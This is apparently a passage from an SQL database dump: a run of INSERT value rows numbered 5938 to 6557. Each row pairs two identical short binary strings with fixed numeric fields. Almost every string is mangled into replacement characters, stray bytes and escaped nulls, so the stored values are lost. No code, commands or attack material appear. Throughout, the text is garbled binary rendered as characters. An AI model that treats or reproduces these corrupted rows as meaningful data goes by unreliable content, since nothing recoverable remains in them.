(5938,'D�r','D�r',1,0,90,0),
(5939,'�F��','�F��',1,0,90,0),
(5940,'���','���',1,0,90,0),
(5941,' ��\0\0\0\0\0\0#A�',' ��\0\0\0\0\0\0#A�',1,0,90,1),
(5942,'Z��Y','Z��Y',1,0,90,0),
(5943,'�ف|','�ف|',1,0,90,0),
(5944,'��\\','��\\',1,0,90,0),
(5945,'RO�','RO�',1,0,90,0),
(5946,'PL3h','PL3h',1,0,90,0),
(5947,'\"��','\"��',1,0,90,0),
(5948,'[k�','[k�',1,0,90,0),
(5949,'3��C','3��C',1,0,90,0),
(5950,'|�','|�',1,0,90,0),
(5951,'���','���',1,0,90,0),
(5952,'|��','|��',1,0,90,0),
(5953,'\n�','\n�',1,0,90,0),
(5954,'��.�','��.�',1,0,90,0),
(5955,'��D�','��D�',1,0,90,0),
(5956,'��','��',1,0,90,0),
(5957,'PPԪ','PPԪ',1,0,90,0),
(5958,'��D','��D',1,0,90,0),
(5959,'Ѷ��','Ѷ��',1,0,90,0),
(5960,'*Y@��\0\0\0\0\0\0\0\0\0','*Y@��\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5961,'�b3I','�b3I',1,0,90,0),
(5962,'��=�','��=�',1,0,90,0),
(5963,' ��',' ��',1,0,90,0),
(5964,'��L','��L',1,0,90,0),
(5965,'UѰ5','UѰ5',1,0,90,0),
(5966,'�A�H','�A�H',1,0,90,0),
(5967,'[�[','[�[',1,0,90,0),
(5968,'��','��',1,0,90,0),
(5969,'\"|��','\"|��',1,0,90,0),
(5970,'/`�N','/`�N',1,0,90,0),
(5971,'ϴ�','ϴ�',1,0,90,0),
(5972,'4�4z','4�4z',1,0,90,0),
(5973,'�P�|','�P�|',1,0,90,0),
(5974,'�ё�','�ё�',1,0,90,0),
(5975,'\"�q','\"�q',1,0,90,0),
(5976,'�z$�','�z$�',1,0,90,0),
(5977,'��r�','��r�',1,0,90,0),
(5978,'�~�','�~�',1,0,90,0),
(5979,'ν&Q','ν&Q',1,0,90,0),
(5980,'g�*�','g�*�',1,0,90,0),
(5981,'&S\0-�\0\0\0\0\0\0\0\0','&S\0-�\0\0\0\0\0\0\0\0',1,0,90,1),
(5982,'6\'0�','6\'0�',1,0,90,0),
(5983,'>���','>���',1,0,90,0),
(5984,'*�\08T�k�����','*�\08T�k�����',1,0,90,1),
(5985,'\"J�$','\"J�$',1,0,90,0),
(5986,'&S\0\0`. 9��Rr\0','&S\0\0`. 9��Rr\0',1,0,90,1),
(5987,'��dT','��dT',1,0,90,0),
(5988,'$H\0k���������','$H\0k���������',1,0,90,1),
(5989,'���','���',1,0,90,0),
(5990,'#�o4','#�o4',1,0,90,0),
(5991,'�rcQ','�rcQ',1,0,90,0),
(5992,'٠�','٠�',1,0,90,0),
(5993,'��#�','��#�',1,0,90,0),
(5994,'�T��','�T��',1,0,90,0),
(5995,'�[@(','�[@(',1,0,90,0),
(5996,'�=�','�=�',1,0,90,0),
(5997,'>H-#','>H-#',1,0,90,0),
(5998,'\\�\Z','\\�\Z',1,0,90,0),
(5999,'^�CX','^�CX',1,0,90,0),
(6000,'g�H','g�H',1,0,90,0),
(6001,'��P7','��P7',1,0,90,0),
(6002,'�c{�','�c{�',1,0,90,0),
(6003,'\"T�b','\"T�b',1,0,90,0),
(6004,'-��','-��',1,0,90,0),
(6005,'(MY�','(MY�',1,0,90,0),
(6006,'-[��','-[��',1,0,90,0),
(6007,'#�','#�',1,0,90,0),
(6008,'*�0�\0\0\0\0\0\0\0','*�0�\0\0\0\0\0\0\0',1,0,90,1),
(6009,'��oK','��oK',1,0,90,0),
(6010,'��b','��b',1,0,90,0),
(6011,'*\0�\0\0\0\0\0�rcQ','*\0�\0\0\0\0\0�rcQ',1,0,90,1),
(6012,'�Z�','�Z�',1,0,90,0),
(6013,'��b','��b',1,0,90,0),
(6014,'p��','p��',1,0,90,0),
(6015,'�d��','�d��',1,0,90,0),
(6016,'��>�','��>�',1,0,90,0),
(6017,'��U\\','��U\\',1,0,90,0),
(6018,'���A','���A',1,0,90,0),
(6019,'+���','+���',1,0,90,0),
(6020,'�A��','�A��',1,0,90,0),
(6021,'�/E','�/E',1,0,90,0),
(6022,'��o;','��o;',1,0,90,0),
(6023,'MI�Q','MI�Q',1,0,90,0),
(6024,'y�/�','y�/�',1,0,90,0),
(6025,'\"���','\"���',1,0,90,0),
(6026,'gY\r�','gY\r�',1,0,90,0),
(6027,'\"Jt�','\"Jt�',1,0,90,0),
(6028,'��`','��`',1,0,90,0),
(6029,'��Py','��Py',1,0,90,0),
(6030,'|�E:','|�E:',1,0,90,0),
(6031,'��oD','��oD',1,0,90,0),
(6032,'���b','���b',1,0,90,0),
(6033,'��p','��p',1,0,90,0),
(6034,'cܦ','cܦ',1,0,90,0),
(6035,'��k','��k',1,0,90,0),
(6036,'����','����',1,0,90,0),
(6037,'��tu','��tu',1,0,90,0),
(6038,'Au�','Au�',1,0,90,0),
(6039,'4�PA','4�PA',1,0,90,0),
(6040,'es9','es9',1,0,90,0),
(6041,'|�E�','|�E�',1,0,90,0),
(6042,'��','��',1,0,90,0),
(6043,'4�eO','4�eO',1,0,90,0),
(6044,'��q','��q',1,0,90,0),
(6045,'�X�','�X�',1,0,90,0),
(6046,'\rC�v','\rC�v',1,0,90,0),
(6047,'(MZn','(MZn',1,0,90,0),
(6048,'���','���',1,0,90,0),
(6049,'(MQ�','(MQ�',1,0,90,0),
(6050,'���','���',1,0,90,0),
(6051,'\\?�=','\\?�=',1,0,90,0),
(6052,'���/','���/',1,0,90,0),
(6053,'��P�','��P�',1,0,90,0),
(6054,'#�*\n','#�*\n',1,0,90,0),
(6055,'Q��Q','Q��Q',1,0,90,0),
(6056,'*\0\0\08��\0F','*\0\0\08��\0F',1,0,90,1),
(6057,'զV\'','զV\'',1,0,90,0),
(6058,'���','���',1,0,90,0),
(6059,'H��n','H��n',1,0,90,0),
(6060,'A7+','A7+',1,0,90,0),
(6061,'ْSs','ْSs',1,0,90,0),
(6062,'���','���',1,0,90,0),
(6063,'v��1','v��1',1,0,90,0),
(6064,'(M1\Z','(M1\Z',1,0,90,0),
(6065,'�','�',1,0,90,0),
(6066,'(M1�','(M1�',1,0,90,0),
(6067,'Yu#�','Yu#�',1,0,90,0),
(6068,'*� @\"�\0\0\0\0\0\0\0','*� @\"�\0\0\0\0\0\0\0',1,0,90,1),
(6069,'���\"','���\"',1,0,90,0),
(6070,'�6r','�6r',1,0,90,0),
(6071,'yO�','yO�',1,0,90,0),
(6072,'g݄','g݄',1,0,90,0),
(6073,'�!�{','�!�{',1,0,90,0),
(6074,'(S=-','(S=-',1,0,90,0),
(6075,'£��','£��',1,0,90,0),
(6076,'�c\\','�c\\',1,0,90,0),
(6077,'�m�','�m�',1,0,90,0),
(6078,'$�','$�',1,0,90,0),
(6079,'g���','g���',1,0,90,0),
(6080,'�G��','�G��',1,0,90,0),
(6081,'��Z','��Z',1,0,90,0),
(6082,'�~z�','�~z�',1,0,90,0),
(6083,'(N�+','(N�+',1,0,90,0),
(6084,'�� �','�� �',1,0,90,0),
(6085,'(S�','(S�',1,0,90,0),
(6086,'���','���',1,0,90,0),
(6087,'-Y�-','-Y�-',1,0,90,0),
(6088,'�m�c','�m�c',1,0,90,0),
(6089,'�&','�&',1,0,90,0),
(6090,'h���','h���',1,0,90,0),
(6091,'���','���',1,0,90,0),
(6092,'h���','h���',1,0,90,0),
(6093,')ؼ',')ؼ',1,0,90,0),
(6094,'%ͪ','%ͪ',1,0,90,0),
(6095,'�]w','�]w',1,0,90,0),
(6096,'h.nu','h.nu',1,0,90,0),
(6097,'�K@','�K@',1,0,90,0),
(6098,'�a`�','�a`�',1,0,90,0),
(6099,'\"�','\"�',1,0,90,0),
(6100,'�ׁ�','�ׁ�',1,0,90,0),
(6101,'��','��',1,0,90,0),
(6102,'(z��','(z��',1,0,90,0),
(6103,'(S|','(S|',1,0,90,0),
(6104,'D��','D��',1,0,90,0),
(6105,'h-��','h-��',1,0,90,0),
(6106,'\n��','\n��',1,0,90,0),
(6107,'\"�','\"�',1,0,90,0),
(6108,'\rC�?','\rC�?',1,0,90,0),
(6109,'\"��\'','\"��\'',1,0,90,0),
(6110,'Q[�','Q[�',1,0,90,0),
(6111,'PXW�','PXW�',1,0,90,0),
(6112,'�F��','�F��',1,0,90,0),
(6113,'g�O�','g�O�',1,0,90,0),
(6114,'��\n�','��\n�',1,0,90,0),
(6115,'\rC�G','\rC�G',1,0,90,0),
(6116,'��T','��T',1,0,90,0),
(6117,'���','���',1,0,90,0),
(6118,'�5/�','�5/�',1,0,90,0),
(6119,'�3','�3',1,0,90,0),
(6120,'���','���',1,0,90,0),
(6121,'>���','>���',1,0,90,0),
(6122,'���,','���,',1,0,90,0),
(6123,'��\'�','��\'�',1,0,90,0),
(6124,'6Cy�','6Cy�',1,0,90,0),
(6125,'ْSU','ْSU',1,0,90,0),
(6126,'(z�','(z�',1,0,90,0),
(6127,'h�N�','h�N�',1,0,90,0),
(6128,'��','��',1,0,90,0),
(6129,'w�n','w�n',1,0,90,0),
(6130,'R���','R���',1,0,90,0),
(6131,'Ye�','Ye�',1,0,90,0),
(6132,'\"|�_','\"|�_',1,0,90,0),
(6133,'\rq<�','\rq<�',1,0,90,0),
(6134,'��>','��>',1,0,90,0),
(6135,'x<�','x<�',1,0,90,0),
(6136,'ƻ�','ƻ�',1,0,90,0),
(6137,'(z��','(z��',1,0,90,0),
(6138,'-�J~','-�J~',1,0,90,0),
(6139,'��<�','��<�',1,0,90,0),
(6140,'�� ','�� ',1,0,90,0),
(6141,'��\\','��\\',1,0,90,0),
(6142,'U��','U��',1,0,90,0),
(6143,'���\"','���\"',1,0,90,0),
(6144,'���','���',1,0,90,0),
(6145,'g\\�R','g\\�R',1,0,90,0),
(6146,'ϴLJ','ϴLJ',1,0,90,0),
(6147,'h+��','h+��',1,0,90,0),
(6148,'��9Y','��9Y',1,0,90,0),
(6149,'q�','q�',1,0,90,0),
(6150,'�cE�','�cE�',1,0,90,0),
(6151,'B�@','B�@',1,0,90,0),
(6152,'(z�|','(z�|',1,0,90,0),
(6153,'���','���',1,0,90,0),
(6154,'U�','U�',1,0,90,0),
(6155,'ʬ\Z1','ʬ\Z1',1,0,90,0),
(6156,'�6}�','�6}�',1,0,90,0),
(6157,'���>','���>',1,0,90,0),
(6158,'/`�','/`�',1,0,90,0),
(6159,'^�[�','^�[�',1,0,90,0),
(6160,'�\08�','�\08�',1,0,90,0),
(6161,'��8:','��8:',1,0,90,0),
(6162,'\rC�\'','\rC�\'',1,0,90,0),
(6163,'vY�%','vY�%',1,0,90,0),
(6164,'���','���',1,0,90,0),
(6165,'(MP�','(MP�',1,0,90,0),
(6166,'-L��','-L��',1,0,90,0),
(6167,'���','���',1,0,90,0),
(6168,'g��\n','g��\n',1,0,90,0),
(6169,'v��3','v��3',1,0,90,0),
(6170,'6�\"�','6�\"�',1,0,90,0),
(6171,'g`�','g`�',1,0,90,0),
(6172,'��A�','��A�',1,0,90,0),
(6173,'\'eH#','\'eH#',1,0,90,0),
(6174,'*� eB\0\0\0\0\0\0\0','*� eB\0\0\0\0\0\0\0',1,0,90,1),
(6175,'(S!\Z','(S!\Z',1,0,90,0),
(6176,'(z�','(z�',1,0,90,0),
(6177,'�A|�','�A|�',1,0,90,0),
(6178,'\rC�+','\rC�+',1,0,90,0),
(6179,'��Ko','��Ko',1,0,90,0),
(6180,'gV��','gV��',1,0,90,0),
(6181,'&�0','&�0',1,0,90,0),
(6182,'��8�','��8�',1,0,90,0),
(6183,' D�P �@IU����',' D�P �@IU����',1,0,90,1),
(6184,'E@!s','E@!s',1,0,90,0),
(6185,'$�%�\0Aj�sH�r','$�%�\0Aj�sH�r',1,0,90,1),
(6186,'(M_j','(M_j',1,0,90,0),
(6187,'gx�v','gx�v',1,0,90,0),
(6188,'g]','g]',1,0,90,0),
(6189,'g�=','g�=',1,0,90,0),
(6190,'��R','��R',1,0,90,0),
(6191,'h�%�','h�%�',1,0,90,0),
(6192,'g$�','g$�',1,0,90,0),
(6193,'�*','�*',1,0,90,0),
(6194,'\"��','\"��',1,0,90,0),
(6195,'��Hy','��Hy',1,0,90,0),
(6196,'\rC�~','\rC�~',1,0,90,0),
(6197,'+��','+��',1,0,90,0),
(6198,'\"�y','\"�y',1,0,90,0),
(6199,'�G�A','�G�A',1,0,90,0),
(6200,'�1�R','�1�R',1,0,90,0),
(6201,' ^',' ^',1,0,90,0),
(6202,'(z��','(z��',1,0,90,0),
(6203,'�.W3','�.W3',1,0,90,0),
(6204,'� ��','� ��',1,0,90,0),
(6205,'�i�','�i�',1,0,90,0),
(6206,'_o�u','_o�u',1,0,90,0),
(6207,'E\n6�','E\n6�',1,0,90,0),
(6208,'N�\0�','N�\0�',1,0,90,0),
(6209,'Ɣ','Ɣ',1,0,90,0),
(6210,'B�B','B�B',1,0,90,0),
(6211,'-WQ)','-WQ)',1,0,90,0),
(6212,'\rCÖ','\rCÖ',1,0,90,0),
(6213,']�D^',']�D^',1,0,90,0),
(6214,'hU�','hU�',1,0,90,0),
(6215,'geɜ','geɜ',1,0,90,0),
(6216,'��u\n','��u\n',1,0,90,0),
(6217,'#�c~','#�c~',1,0,90,0),
(6218,'��j3','��j3',1,0,90,0),
(6219,'�*�','�*�',1,0,90,0),
(6220,'��','��',1,0,90,0),
(6221,'�L','�L',1,0,90,0),
(6222,'y��','y��',1,0,90,0),
(6223,'#��\r','#��\r',1,0,90,0),
(6224,'�@|�','�@|�',1,0,90,0),
(6225,'Ϛ�\"','Ϛ�\"',1,0,90,0),
(6226,'|ߏ�','|ߏ�',1,0,90,0),
(6227,'qm7!','qm7!',1,0,90,0),
(6228,'&\n\0\0!91>��(�A','&\n\0\0!91>��(�A',1,0,90,1),
(6229,'��','��',1,0,90,0),
(6230,'- z�','- z�',1,0,90,0),
(6231,'(S �','(S �',1,0,90,0),
(6232,'Ne��','Ne��',1,0,90,0),
(6233,'&y+h','&y+h',1,0,90,0),
(6234,'���','���',1,0,90,0),
(6235,'g��','g��',1,0,90,0),
(6236,'��S','��S',1,0,90,0),
(6237,'ۭI','ۭI',1,0,90,0),
(6238,'*x\0\0\0\0\0\0\0h\0','*x\0\0\0\0\0\0\0h\0',1,0,90,1),
(6239,'�6r$','�6r$',1,0,90,0),
(6240,'4��.','4��.',1,0,90,0),
(6241,'-M�\r','-M�\r',1,0,90,0),
(6242,'����','����',1,0,90,0),
(6243,'-RxT','-RxT',1,0,90,0),
(6244,'<+�Y','<+�Y',1,0,90,0),
(6245,'*�`�Q\0\0\0\0\0\0\0','*�`�Q\0\0\0\0\0\0\0',1,0,90,1),
(6246,'��h','��h',1,0,90,0),
(6247,'p��','p��',1,0,90,0),
(6248,'{�','{�',1,0,90,0),
(6249,'�Rp','�Rp',1,0,90,0),
(6250,'�b9�','�b9�',1,0,90,0),
(6251,'\rC�s','\rC�s',1,0,90,0),
(6252,'$��\0tT\0����N','$��\0tT\0����N',1,0,90,1),
(6253,'gj��','gj��',1,0,90,0),
(6254,'tP+>','tP+>',1,0,90,0),
(6255,'#\\E�','#\\E�',1,0,90,0),
(6256,'��\n','��\n',1,0,90,0),
(6257,'g�A�','g�A�',1,0,90,0),
(6258,'Uݡ2','Uݡ2',1,0,90,0),
(6259,'a,�','a,�',1,0,90,0),
(6260,'2S','2S',1,0,90,0),
(6261,'���|','���|',1,0,90,0),
(6262,'\rC�A','\rC�A',1,0,90,0),
(6263,'\rC�!','\rC�!',1,0,90,0),
(6264,'\rCê','\rCê',1,0,90,0),
(6265,'\rCÌ','\rCÌ',1,0,90,0),
(6266,'(MQ�','(MQ�',1,0,90,0),
(6267,'(z�','(z�',1,0,90,0),
(6268,'(z�C','(z�C',1,0,90,0),
(6269,'(z�V','(z�V',1,0,90,0),
(6270,'(MP�','(MP�',1,0,90,0),
(6271,'\rC�s','\rC�s',1,0,90,0),
(6272,'g��g','g��g',1,0,90,0),
(6273,'+���','+���',1,0,90,0),
(6274,'�\0�','�\0�',1,0,90,0),
(6275,'�/M','�/M',1,0,90,0),
(6276,'��\n�','��\n�',1,0,90,0),
(6277,'&��\0\0\0\0\0\0O`','&��\0\0\0\0\0\0O`',1,0,90,1),
(6278,'|�;=','|�;=',1,0,90,0),
(6279,'�GP�','�GP�',1,0,90,0),
(6280,'�\0�>','�\0�>',1,0,90,0),
(6281,'%x��','%x��',1,0,90,0),
(6282,'�n�','�n�',1,0,90,0),
(6283,'(z�e','(z�e',1,0,90,0),
(6284,'(z�<','(z�<',1,0,90,0),
(6285,'^��1','^��1',1,0,90,0),
(6286,'(z�','(z�',1,0,90,0),
(6287,'&�\0�\0\0\0\0�m','&�\0�\0\0\0\0�m',1,0,90,1),
(6288,'(MQ`','(MQ`',1,0,90,0),
(6289,'(z�Q','(z�Q',1,0,90,0),
(6290,'e2�','e2�',1,0,90,0),
(6291,'�:�','�:�',1,0,90,0),
(6292,'w*�r','w*�r',1,0,90,0),
(6293,'&�\0�\0\0\0\0YO%','&�\0�\0\0\0\0YO%',1,0,90,1),
(6294,'�|�','�|�',1,0,90,0),
(6295,'Kw�n','Kw�n',1,0,90,0),
(6296,'\r(5j','\r(5j',1,0,90,0),
(6297,'�','�',1,0,90,0),
(6298,'��\r�','��\r�',1,0,90,0),
(6299,'q��','q��',1,0,90,0),
(6300,'(M\r�','(M\r�',1,0,90,0),
(6301,'�GΉ','�GΉ',1,0,90,0),
(6302,'��:','��:',1,0,90,0),
(6303,'�εV','�εV',1,0,90,0),
(6304,' �\0(�w<�',' �\0(�w<�',1,0,90,1),
(6305,'�c','�c',1,0,90,0),
(6306,'(S9','(S9',1,0,90,0),
(6307,'\rR�1','\rR�1',1,0,90,0),
(6308,'䴎','䴎',1,0,90,0),
(6309,'��$�','��$�',1,0,90,0),
(6310,'(N�]','(N�]',1,0,90,0),
(6311,'��ݱ','��ݱ',1,0,90,0),
(6312,'(u��','(u��',1,0,90,0),
(6313,'\rR�2','\rR�2',1,0,90,0),
(6314,'\rR�K','\rR�K',1,0,90,0),
(6315,'����','����',1,0,90,0),
(6316,'Av/','Av/',1,0,90,0),
(6317,'�m�','�m�',1,0,90,0),
(6318,'���','���',1,0,90,0),
(6319,'�+=','�+=',1,0,90,0),
(6320,' K���\0\0\0\0\0\0\0',' K���\0\0\0\0\0\0\0',1,0,90,1),
(6321,'(z�','(z�',1,0,90,0),
(6322,'\r\\X�','\r\\X�',1,0,90,0),
(6323,'(z��','(z��',1,0,90,0),
(6324,'õ�e','õ�e',1,0,90,0),
(6325,'(u�t','(u�t',1,0,90,0),
(6326,'裢','裢',1,0,90,0),
(6327,'(�\0�,�i�\rPQ','(�\0�,�i�\rPQ',1,0,90,1),
(6328,'(u��','(u��',1,0,90,0),
(6329,'\rR� ','\rR� ',1,0,90,0),
(6330,'�;e�','�;e�',1,0,90,0),
(6331,';��',';��',1,0,90,0),
(6332,'�','�',1,0,90,0),
(6333,'ƞ','ƞ',1,0,90,0),
(6334,'\rR�','\rR�',1,0,90,0),
(6335,'�TX','�TX',1,0,90,0),
(6336,'��H�','��H�',1,0,90,0),
(6337,'|]�','|]�',1,0,90,0),
(6338,'�H�','�H�',1,0,90,0),
(6339,'Rf�','Rf�',1,0,90,0),
(6340,'m{�','m{�',1,0,90,0),
(6341,'A�','A�',1,0,90,0),
(6342,'��/�','��/�',1,0,90,0),
(6343,'(u�','(u�',1,0,90,0),
(6344,'��(�','��(�',1,0,90,0),
(6345,'T*','T*',1,0,90,0),
(6346,'h.nx','h.nx',1,0,90,0),
(6347,'\rR�U','\rR�U',1,0,90,0),
(6348,'˯2','˯2',1,0,90,0),
(6349,'裑','裑',1,0,90,0),
(6350,'-wS�','-wS�',1,0,90,0),
(6351,'g\Z��','g\Z��',1,0,90,0),
(6352,'g��\r','g��\r',1,0,90,0),
(6353,'��\Z','��\Z',1,0,90,0),
(6354,'���','���',1,0,90,0),
(6355,'���','���',1,0,90,0),
(6356,'��\n�','��\n�',1,0,90,0),
(6357,'$\0�\0\0\0\0�<���WN�','$\0�\0\0\0\0�<���WN�',1,0,90,1),
(6358,'/b�(','/b�(',1,0,90,0),
(6359,'Q��Y','Q��Y',1,0,90,0),
(6360,'�\\#','�\\#',1,0,90,0),
(6361,'O��V','O��V',1,0,90,0),
(6362,'xZY','xZY',1,0,90,0),
(6363,'��\'','��\'',1,0,90,0),
(6364,'z�|3','z�|3',1,0,90,0),
(6365,'>L�6','>L�6',1,0,90,0),
(6366,'��','��',1,0,90,0),
(6367,'����','����',1,0,90,0),
(6368,'#�i�','#�i�',1,0,90,0),
(6369,'���','���',1,0,90,0),
(6370,'���','���',1,0,90,0),
(6371,'.i\'�','.i\'�',1,0,90,0),
(6372,'#�Qa','#�Qa',1,0,90,0),
(6373,'��>','��>',1,0,90,0),
(6374,'N��','N��',1,0,90,0),
(6375,'3Y&�','3Y&�',1,0,90,0),
(6376,'��\\','��\\',1,0,90,0),
(6377,'���-','���-',1,0,90,0),
(6378,'xO��','xO��',1,0,90,0),
(6379,'���','���',1,0,90,0),
(6380,'y%��','y%��',1,0,90,0),
(6381,'Q�','Q�',1,0,90,0),
(6382,'�.T�','�.T�',1,0,90,0),
(6383,'*�\0�;\0\0\0\0\0\0\0','*�\0�;\0\0\0\0\0\0\0',1,0,90,1),
(6384,'�n�O','�n�O',1,0,90,0),
(6385,'#ru','#ru',1,0,90,0),
(6386,'+�p','+�p',1,0,90,0),
(6387,'w�','w�',1,0,90,0),
(6388,'�G��','�G��',1,0,90,0),
(6389,'�r�6','�r�6',1,0,90,0),
(6390,'\"��','\"��',1,0,90,0),
(6391,'@&`G','@&`G',1,0,90,0),
(6392,'���','���',1,0,90,0),
(6393,'*�\0��\0\0\0\0\0\0\0','*�\0��\0\0\0\0\0\0\0',1,0,90,1),
(6394,'�G�','�G�',1,0,90,0),
(6395,'��<�','��<�',1,0,90,0),
(6396,'���','���',1,0,90,0),
(6397,'*\0�\0\0\0\0\0@&`G','*\0�\0\0\0\0\0@&`G',1,0,90,1),
(6398,'���','���',1,0,90,0),
(6399,'�X\n','�X\n',1,0,90,0),
(6400,'^�Bv','^�Bv',1,0,90,0),
(6401,'\"Yz','\"Yz',1,0,90,0),
(6402,'|�s�','|�s�',1,0,90,0),
(6403,'g�.�','g�.�',1,0,90,0),
(6404,'\r��.','\r��.',1,0,90,0),
(6405,'�Ӊ�','�Ӊ�',1,0,90,0),
(6406,'��:\"','��:\"',1,0,90,0),
(6407,'/b�p','/b�p',1,0,90,0),
(6408,'�W�','�W�',1,0,90,0),
(6409,'J�J�','J�J�',1,0,90,0),
(6410,'$�\Z�\0��؍&','$�\Z�\0��؍&',1,0,90,1),
(6411,'��e1','��e1',1,0,90,0),
(6412,'誷','誷',1,0,90,0),
(6413,'U\r��','U\r��',1,0,90,0),
(6414,'��1','��1',1,0,90,0),
(6415,'+�','+�',1,0,90,0),
(6416,'g���','g���',1,0,90,0),
(6417,'��}','��}',1,0,90,0),
(6418,'J묧','J묧',1,0,90,0),
(6419,'/fݝ','/fݝ',1,0,90,0),
(6420,'D��@','D��@',1,0,90,0),
(6421,'N.+I','N.+I',1,0,90,0),
(6422,'+��','+��',1,0,90,0),
(6423,'�Ɏ','�Ɏ',1,0,90,0),
(6424,'���','���',1,0,90,0),
(6425,'#ʼn�','#ʼn�',1,0,90,0),
(6426,'���','���',1,0,90,0),
(6427,'g\\� ','g\\� ',1,0,90,0),
(6428,'\r�','\r�',1,0,90,0),
(6429,'^�I�','^�I�',1,0,90,0),
(6430,'\"J��','\"J��',1,0,90,0),
(6431,'���','���',1,0,90,0),
(6432,'*5C\0#���b�','*5C\0#���b�',1,0,90,1),
(6433,'���','���',1,0,90,0),
(6434,'Y�U�','Y�U�',1,0,90,0),
(6435,'N�&W','N�&W',1,0,90,0),
(6436,'�?m;','�?m;',1,0,90,0),
(6437,'�br�','�br�',1,0,90,0),
(6438,'M7�.','M7�.',1,0,90,0),
(6439,'A�Y','A�Y',1,0,90,0),
(6440,'*5C\0#���b\rO','*5C\0#���b\rO',1,0,90,1),
(6441,'y(�!','y(�!',1,0,90,0),
(6442,'��J','��J',1,0,90,0),
(6443,'g�yg','g�yg',1,0,90,0),
(6444,'w�K','w�K',1,0,90,0),
(6445,'��\n�','��\n�',1,0,90,0),
(6446,',��',',��',1,0,90,0),
(6447,'�GR�','�GR�',1,0,90,0),
(6448,'N.�','N.�',1,0,90,0),
(6449,'��T','��T',1,0,90,0),
(6450,'*��','*��',1,0,90,0),
(6451,'>H ','>H ',1,0,90,0),
(6452,'&U\00\0�\0\0\0\0\0\0\0','&U\00\0�\0\0\0\0\0\0\0',1,0,90,1),
(6453,'*G�\0\0 \0\0\0\0\0\0\0','*G�\0\0 \0\0\0\0\0\0\0',1,0,90,1),
(6454,'U\r�t','U\r�t',1,0,90,0),
(6455,'#��?','#��?',1,0,90,0),
(6456,'�\0Mf','�\0Mf',1,0,90,0),
(6457,'����','����',1,0,90,0),
(6458,'>)l','>)l',1,0,90,0),
(6459,'x��','x��',1,0,90,0),
(6460,'���','���',1,0,90,0),
(6461,'�.�.','�.�.',1,0,90,0),
(6462,'��8','��8',1,0,90,0),
(6463,'B��','B��',1,0,90,0),
(6464,'�\0ц','�\0ц',1,0,90,0),
(6465,' A�\0к\0\0\0\0\0\0\0\0',' A�\0к\0\0\0\0\0\0\0\0',1,0,90,1),
(6466,'$�ۘ\0��I�Jc�J','$�ۘ\0��I�Jc�J',1,0,90,1),
(6467,'/M','/M',1,0,90,0),
(6468,'�\Z5�','�\Z5�',1,0,90,0),
(6469,'O�z�','O�z�',1,0,90,0),
(6470,'���l','���l',1,0,90,0),
(6471,'O��g','O��g',1,0,90,0),
(6472,'�','�',1,0,90,0),
(6473,'�\n>','�\n>',1,0,90,0),
(6474,'>ٳ�','>ٳ�',1,0,90,0),
(6475,'Ʀ','Ʀ',1,0,90,0),
(6476,'��\r�','��\r�',1,0,90,0),
(6477,'�.Q','�.Q',1,0,90,0),
(6478,'h��2','h��2',1,0,90,0),
(6479,'\"�Q`','\"�Q`',1,0,90,0),
(6480,'M7��','M7��',1,0,90,0),
(6481,'&\0<\0\0\0\0�<���܀�','&\0<\0\0\0\0�<���܀�',1,0,90,1),
(6482,'����','����',1,0,90,0),
(6483,'E\n:/','E\n:/',1,0,90,0),
(6484,'$�y\0�nI���','$�y\0�nI���',1,0,90,1),
(6485,'.MQ�','.MQ�',1,0,90,0),
(6486,'��5\n','��5\n',1,0,90,0),
(6487,'Xc(�','Xc(�',1,0,90,0),
(6488,'��','��',1,0,90,0),
(6489,'�G�Z','�G�Z',1,0,90,0),
(6490,'��','��',1,0,90,0),
(6491,'�8','�8',1,0,90,0),
(6492,'�\0�o','�\0�o',1,0,90,0),
(6493,'h)��','h)��',1,0,90,0),
(6494,';n|�',';n|�',1,0,90,0),
(6495,'���','���',1,0,90,0),
(6496,' \r�x\0\0\0\0\0\0\0\0\0:',' \r�x\0\0\0\0\0\0\0\0\0:',1,0,90,1),
(6497,'�\0��','�\0��',1,0,90,0),
(6498,'$\0�\0\0\0\0�<���?|�','$\0�\0\0\0\0�<���?|�',1,0,90,1),
(6499,'�\0�','�\0�',1,0,90,0),
(6500,'D��','D��',1,0,90,0),
(6501,'hU�','hU�',1,0,90,0),
(6502,'���3','���3',1,0,90,0),
(6503,'|߮�','|߮�',1,0,90,0),
(6504,'��a3','��a3',1,0,90,0),
(6505,'��\n!','��\n!',1,0,90,0),
(6506,'_�k','_�k',1,0,90,0),
(6507,'��\n�','��\n�',1,0,90,0),
(6508,'��Q','��Q',1,0,90,0),
(6509,'��W�','��W�',1,0,90,0),
(6510,'��Y(','��Y(',1,0,90,0),
(6511,'�� ]','�� ]',1,0,90,0),
(6512,'���','���',1,0,90,0),
(6513,'J�>�','J�>�',1,0,90,0),
(6514,'�,L�','�,L�',1,0,90,0),
(6515,'���.','���.',1,0,90,0),
(6516,'&\0�-\0���Z�F','&\0�-\0���Z�F',1,0,90,1),
(6517,'��:;','��:;',1,0,90,0),
(6518,'��','��',1,0,90,0),
(6519,'��U�','��U�',1,0,90,0),
(6520,'J��','J��',1,0,90,0),
(6521,'���','���',1,0,90,0),
(6522,'���','���',1,0,90,0),
(6523,'����','����',1,0,90,0),
(6524,'�cB','�cB',1,0,90,0),
(6525,'�;a�','�;a�',1,0,90,0),
(6526,'+�f','+�f',1,0,90,0),
(6527,'J��V','J��V',1,0,90,0),
(6528,'J���','J���',1,0,90,0),
(6529,'(MF�','(MF�',1,0,90,0),
(6530,'���','���',1,0,90,0),
(6531,'���','���',1,0,90,0),
(6532,'J�ޔ','J�ޔ',1,0,90,0),
(6533,'���','���',1,0,90,0),
(6534,'��^','��^',1,0,90,0),
(6535,'g�t|','g�t|',1,0,90,0),
(6536,'�cI4','�cI4',1,0,90,0),
(6537,'J��','J��',1,0,90,0),
(6538,'4�)�','4�)�',1,0,90,0),
(6539,'���','���',1,0,90,0),
(6540,'���B','���B',1,0,90,0),
(6541,'��ſ','��ſ',1,0,90,0),
(6542,'J�ު','J�ު',1,0,90,0),
(6543,'��Қ','��Қ',1,0,90,0),
(6544,'��/�','��/�',1,0,90,0),
(6545,'�Fe3','�Fe3',1,0,90,0),
(6546,'J�ޓ','J�ޓ',1,0,90,0),
(6547,'J��q','J��q',1,0,90,0),
(6548,'䭍','䭍',1,0,90,0),
(6549,'��','��',1,0,90,0),
(6550,'���','���',1,0,90,0),
(6551,'�/_','�/_',1,0,90,0),
(6552,'\rR7','\rR7',1,0,90,0),
(6553,'��9g','��9g',1,0,90,0),
(6554,'�eDs','�eDs',1,0,90,0),
(6555,'�au','�au',1,0,90,0),
(6556,'�_','�_',1,0,90,0),
(6557,'^=�','^=�',1,0,90,0),
